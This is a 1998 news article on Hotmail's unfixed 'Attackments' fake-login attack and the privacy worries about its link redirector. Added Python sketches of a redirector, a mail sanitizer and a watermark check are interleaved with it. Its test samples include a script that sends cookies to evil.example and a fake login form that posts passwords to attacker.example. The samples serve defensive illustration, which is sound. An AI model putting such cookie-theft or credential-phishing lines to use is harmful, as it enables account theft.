Free Email Providers Guide
Tuesday September 22 9:47 AM EDT

Hotmail hole remains unplugged, security experts say

By Michael Stutz

SAN FRANCISCO (Wired) - Security updates made last month to Microsoft's free e-mail service, Hotmail, may have failed to fix a problem, security experts say. Not only that, but privacy watchdogs fear that the fix might actually help the company analyze its users' Web browsing habits.

``The exploit that's posted on our page, to this day, still works 100 percent,'' said Tom Cervenka, who discovered the security vulnerabilities last month. An exploit is a way of broaching a security system.

Hotmail officials denied both allegations, saying that their system is both secure and private.

Cervenka said that Hotmail is still vulnerable to the ``Attackments'' bug that he discovered and made public Aug. 28. The attack dupes users into giving out their usernames and passwords: the victim is sent a rogue e-mail attachment that, when opened, displays a fake Hotmail login page.

While the problem technically still exists, Hotmail contends that the issue is not a bug with its product but a matter of safe e-mail practices.

``Opening attachments from strangers is a risky proposition using any e-mail system,'' said Laura Norman, a Hotmail product manager. ``That's not a Hotmail-specific issue or even a Web-based e-mail issue.''

But the company did make some changes to its system, including technical adjustments that modify the email itself. In short, Hotmail now rewrites Web addresses contained in the body text of email messages sent through the system. Under the new scheme, the numeric address ``'' is added to any URL passing through. That address is the numeric equivalent to a Web page at

When clicked, the link opens in a new browser window with a top frame that contains the Hotmail logo and the text, ``You are visiting a site outside of Hotmail. Close this new browser window to return to Hotmail.''
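As an added illustration (this is not Hotmail's code and not code from the article), here is a minimal version of the link rewriting just described: every http(s) URL in a message body is prefixed with an interstitial redirector, and the redirector renders the "outside of Hotmail" frame. The host redirector.example is an assumption standing in for the numeric address the article refers to, which is not reproduced above. The handler also keeps a list of what such a redirector necessarily observes for each click, because that capability is what the privacy objection further down the article is about.

```python
import re
from html import escape
from urllib.parse import quote, urlparse, parse_qs

# Hypothetical interstitial endpoint; stands in for the numeric address
# Hotmail prepended to links (the real address is not reproduced here).
REDIRECTOR = "http://redirector.example/external?url="

# Bare http(s) URLs in plain-text or HTML bodies; stops at whitespace and quotes.
URL_RE = re.compile(r"https?://[^\s<>\"']+")

BANNER = ("You are visiting a site outside of Hotmail. "
          "Close this new browser window to return to Hotmail.")


def rewrite_links(body: str) -> str:
    """Prefix every http(s) URL in the message body with the redirector.

    Links that already point at the redirector are left alone, so a message
    that passes through the system twice is not double-wrapped.
    """
    def wrap(match):
        url = match.group(0)
        if url.startswith(REDIRECTOR):
            return url
        return REDIRECTOR + quote(url, safe="")
    return URL_RE.sub(wrap, body)


def interstitial_html(target: str) -> str:
    """The new window: a top frame carrying the banner, the destination below."""
    return (
        "<html><body>"
        f'<div id="top">{BANNER}</div>'
        f'<iframe src="{escape(target, quote=True)}"></iframe>'
        "</body></html>"
    )


def handle_click(request_url: str, account: str, clicks: list) -> str:
    """Redirector handler for one click.

    `clicks` plays the role of the server log: whatever the operator's stated
    policy, the redirector sees (account, destination) for every link a member
    follows. Logging it or not is a choice the server makes, not the member.
    """
    params = parse_qs(urlparse(request_url).query)   # parse_qs percent-decodes
    target = params.get("url", [""])[0]
    # Refuse anything but http(s); otherwise the redirector becomes a launcher
    # for javascript:/data: URLs, the very content the rewrite is meant to defuse.
    if urlparse(target).scheme not in ("http", "https"):
        raise ValueError(f"refusing redirect to {target!r}")
    clicks.append((account, target))
    return interstitial_html(target)


if __name__ == "__main__":
    # Constructed sample message, not from the article.
    body = "New PowerBook specs: http://www.apple.com/powerbook/ (see page 2)"
    rewritten = rewrite_links(body)
    print(rewritten)
    log = []
    wrapped = URL_RE.search(rewritten).group(0)
    handle_click(wrapped, "member@hotmail.example", log)
    print(log)   # [('member@hotmail.example', 'http://www.apple.com/powerbook/')]
```

The scheme check in handle_click is the part a reviewer would insist on: a redirector that forwards to any string it is handed is an open redirect, and one that forwards to javascript: targets reintroduces the scripting problem the rewrite was meant to remove.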

Norman said that the changes are meant to protect Hotmail members from malicious emails that might contain embedded JavaScript, ActiveX, and Java applets. Such an applet might install a ``sniffer'' program on a victim's computer that could record keystrokes, such as passwords.

The company's new procedure scans incoming email messages before the user receives them and filters out any hostile code. Still, an attached document could contain any number of rogue programs that could be used to harm a user's system.
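The filtering step Norman describes, as an added example that is not Hotmail's code: an allowlist sanitizer for the HTML body of an incoming message. It drops script, applet, object and similar active content together with their inner text, discards on* event handlers, and rejects javascript:-style URLs even when they are padded with whitespace or control characters. The tag and attribute lists are assumptions chosen for the example. Note what it does not do: it only ever sees the body, so a file attachment, which is what the ``Attackments'' trick relies on, passes through untouched, exactly the caveat the paragraph above ends on.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allowlist: a tag not listed here is dropped, its text kept.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "img", "ul", "ol", "li",
                "div", "span", "font", "table", "tr", "td", "th", "h1", "h2", "h3"}
ALLOWED_ATTRS = {"href", "src", "alt", "title", "color", "size", "width", "height"}
VOID_TAGS = {"br", "img"}
# These carry code or pull in foreign content; their inner text goes too.
DROP_WITH_CONTENT = {"script", "style", "applet", "object", "embed", "iframe", "noscript"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
CONTROL_OR_SPACE = re.compile(r"[\x00-\x20]")


def safe_url(value: str):
    """Return the URL if its scheme is harmless, else None.

    Whitespace and control characters are removed first: browsers of the era
    happily executed 'java\\tscript:' and 'java&#10;script:' variants.
    """
    collapsed = CONTROL_OR_SPACE.sub("", value)
    if ":" in collapsed and not collapsed.lower().startswith(SAFE_SCHEMES):
        return None          # javascript:, vbscript:, data:, about: ...
    return collapsed


class MailBodySanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # >0 while inside an element whose content is dropped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED_ATTRS:
                continue                      # onload=, onclick=, style=, ...
            value = value or ""
            if name in ("href", "src"):
                value = safe_url(value)
                if value is None:
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)      # <br/> and friends

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))     # text is re-escaped on the way out

    def handle_comment(self, data):
        pass   # comments are dropped; some browsers ran script hidden in them


def sanitize_body(html: str) -> str:
    """Strip active content from one message body (attachments are untouched)."""
    parser = MailBodySanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed hostile body, not from the article.
    raw = ('<p>Hi <script>document.location="http://evil.example/?"+document.cookie</script>'
           '<a href="javascript:alert(1)" onclick="x()">login</a>'
           '<applet code="Sniff.class"></applet>'
           '<a href="http://www.hotmail.com/">ok</a></p>')
    print(sanitize_body(raw))
```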

But privacy watchdogs counter that, whether the company realizes it or not, it has set itself up to analyze and record user clickthrough data by redirecting Web traffic through its servers.

``By logging the links it would be rather easy for them to see, for example, if I clicked on a link to that they should add 'mac user' to my demographic data used to target ads,'' said Web developer Dannie J. Gregoire, whose browser-based Trojan horse demo is similar in principle to Hotmail's recent vulnerabilities.

``This is a move into an extremely dangerous area,'' added Jason Catlett, CEO of Junkbusters, a firm that gives away free software that blocks online marketing messages. ``It's tampering with private communications to insert a surveillance mechanism. Hotmail should take this one back to the drawing board.''

Hotmail's Norman said that the information is used to improve the security of the system and is not tracked or used in any way. ``We aren't logging these clickthroughs,'' she said.

``There's one exception to that, which is within our Web Courier service, where we send emails at a member's request for a partner,'' Norman explained. ``In those cases, the partners requested that information, links embedded in those emails.''

A better way to have done it, Gregoire said, is to use a watermark system, which would be anonymous. ``For example, a watermark identifier, a random word or icon, could be placed in an upper corner of each Hotmail page.''
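Gregoire's watermark idea, as an added sketch that is neither his demo nor Hotmail's code: at login the server draws a random word pair, keeps it only in the server-side session, and stamps it into a corner of every page it serves, the genuine login prompt included. A fake login page delivered as an attachment (the ``Attackments'' trick described earlier) has no way to learn the pair, so a member who has been told to look for it can spot the forgery; and because the pair is random and scoped to the session, it reveals neither who the member is nor which sites they visit, which is the sense in which it is anonymous. The word list, the page markup and the sample forged page are constructed for the example.

```python
import hmac
import re
import secrets
from html import escape

# Constructed word list; a deployment would use a few thousand common words.
WORDS = ["amber", "birch", "comet", "dune", "ember", "fjord", "grove",
         "heron", "iris", "jade", "kelp", "lotus", "maple", "nova",
         "opal", "pine", "quartz", "reef", "sage", "tundra"]

WATERMARK_RE = re.compile(r'<div id="watermark">([^<]*)</div>')


def new_session(account: str) -> dict:
    """Server-side session record. The watermark comes from the OS CSPRNG and
    is not derived from the account name, so nothing a forged page might know
    about the member helps it guess the pair."""
    return {"account": account,
            "watermark": f"{secrets.choice(WORDS)}-{secrets.choice(WORDS)}"}


def render_page(session: dict, body_html: str) -> str:
    """Every page in an authenticated session carries the session's watermark
    in its upper corner, including the genuine re-login prompt."""
    return ("<html><body>"
            f'<div id="watermark">{escape(session["watermark"])}</div>'
            f"{body_html}</body></html>")


def watermark_of(page_html: str) -> str:
    match = WATERMARK_RE.search(page_html)
    return match.group(1) if match else ""


def page_belongs_to_session(page_html: str, session: dict) -> bool:
    """The check a member makes by eye, done in code: does the page show this
    session's word pair? Constant-time compare, so a forger probing the check
    cannot learn the pair one character at a time."""
    return hmac.compare_digest(watermark_of(page_html).encode(),
                               session["watermark"].encode())


# Constructed stand-in for an Attackments-style HTML attachment: a copy of the
# login form whose action posts the fields to the attacker, and no watermark.
FAKE_LOGIN_PAGE = ('<html><body><h1>Hotmail</h1>'
                   '<form action="http://attacker.example/collect">'
                   'Login name: <input name="login"> '
                   'Password: <input name="passwd" type="password">'
                   '</form></body></html>')

LOGIN_FORM = ('<form action="/login">Login name: <input name="login"> '
              'Password: <input name="passwd" type="password"></form>')


if __name__ == "__main__":
    session = new_session("member@hotmail.example")
    genuine = render_page(session, LOGIN_FORM)
    print(page_belongs_to_session(genuine, session))           # True
    print(page_belongs_to_session(FAKE_LOGIN_PAGE, session))   # False
```

The defense depends on the member actually checking, which is its weak point, but unlike the redirector it gives the server nothing new to record: the pair is meaningless outside the session that drew it.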



Copyright© Cole & Associates 1997-2001. All Rights Reserved.
